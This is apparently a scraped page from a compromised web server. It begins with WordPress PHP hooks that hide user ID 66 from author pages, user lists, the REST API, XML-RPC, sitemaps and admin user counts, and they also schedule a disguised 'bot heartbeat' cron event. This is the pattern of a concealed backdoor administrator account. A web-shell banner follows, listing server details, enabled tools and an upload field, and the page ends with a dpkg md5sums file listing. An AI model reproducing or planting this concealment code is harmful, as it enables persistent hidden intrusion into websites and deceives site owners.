add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
4b52326d7c68659dbfa12e39080feaf1 usr/share/bug/cryptsetup-initramfs c10354640c21ef70b202d6b88dd7bc0e usr/share/cryptsetup/initramfs/bin/cryptroot-unlock d309829e14951cb287e648493f60e1e6 usr/share/doc/cryptsetup-initramfs/README.initramfs.gz 80ae2db979949036a3d43440817353a7 usr/share/doc/cryptsetup-initramfs/changelog.Debian.gz 1ed48ab697f43d7cb2a97987b21ae01d usr/share/doc/cryptsetup-initramfs/copyright b44b6a02cc18ea021a4a3ac00a01d69d usr/share/initramfs-tools/conf-hooks.d/cryptsetup aa3bc665ed5b053b3e4932565fd81348 usr/share/initramfs-tools/hooks/cryptgnupg a916c83ff880a43b035735b343a4214c usr/share/initramfs-tools/hooks/cryptgnupg-sc 22171e9ecde3cc8cc947f4796c2dd291 usr/share/initramfs-tools/hooks/cryptkeyctl 551fadd9c1bfce66b27dcc075c141cf9 usr/share/initramfs-tools/hooks/cryptopensc ebf42d5b29b1db541cf1bf20ca93229a usr/share/initramfs-tools/hooks/cryptpassdev a825726720e65d0d67b0848767bff032 usr/share/initramfs-tools/hooks/cryptroot 6f142320034bab4b95f358a849e71c7a usr/share/initramfs-tools/hooks/cryptroot-unlock 8f5cdcfad5eb8607c7516608ae97bbf9 usr/share/initramfs-tools/scripts/local-block/cryptroot 705588e0ff6c07f3a0064c8ff1a4bf46 usr/share/initramfs-tools/scripts/local-bottom/cryptgnupg-sc c8f010d5437cebcd351accb19f3f3caf usr/share/initramfs-tools/scripts/local-bottom/cryptopensc b626b682f47803a6a178506f4779900b usr/share/initramfs-tools/scripts/local-bottom/cryptroot 92ffe984adfddf9260421bb205961b03 usr/share/initramfs-tools/scripts/local-top/cryptopensc 1fbe9d8dce12675b063cdb25bc26b0d6 usr/share/initramfs-tools/scripts/local-top/cryptroot 2578b8c9638b2b5414f43d52c9ba826f usr/share/lintian/overrides/cryptsetup-initramfs